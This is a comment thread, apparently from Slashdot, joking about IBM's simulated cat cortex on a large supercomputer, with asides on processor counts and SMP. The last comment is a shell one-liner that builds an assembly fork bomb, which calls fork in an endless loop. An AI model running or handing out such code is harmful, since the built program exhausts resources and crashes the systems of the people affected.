IBM Takes a (Feline) Step Toward Thinking Machines
bth writes "A computer with the power of a human brain is not yet near. But this week researchers from IBM Corp. are reporting that they've simulated a cat's cerebral cortex, the thinking part of the brain, using a massive supercomputer. The computer has 147,456 processors (most modern PCs have just one or two processors) and 144 terabytes of main memory — 100,000 times as much as your computer has."
Does it keep wanting cheezburgerz all the time?
Regards, Boyan
the first thing they teach it is to stop scratching my couch.
They've spent millions teaching a computer how to destroy furnature and shit in your shoes.
I've never shoed a horse, but I once told a donkey to piss off!
Now if the could just get it out of sleep mode.
then "Deep Thought II"
then "Deep Blue"
next "Deep Pussy"??
Nah but it will refuse to be mouse operated ...
It's often thought that gibibytes and tebibytes were invented to allow "giga" and "tera" to retain their conventional meanings as powers of 10 even when used to refer to quantities of data.
However, the true reason was to enable an entirely new form of pedantry.
Yes, yes it is.
http://en.wikipedia.org/wiki/Symmetric_multiprocessing
In computing, symmetric multiprocessing or SMP involves a multiprocessor computer architecture where two or more identical processors can connect to a single shared main memory. Most common multiprocessor systems today use an SMP architecture. In the case of multi-core processors, the SMP architecture applies to the cores, treating them as separate processors.
You disagree with Wikipedia. That means you've been proven wrong in front of the whole Internet. Hang your head in shame.
echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;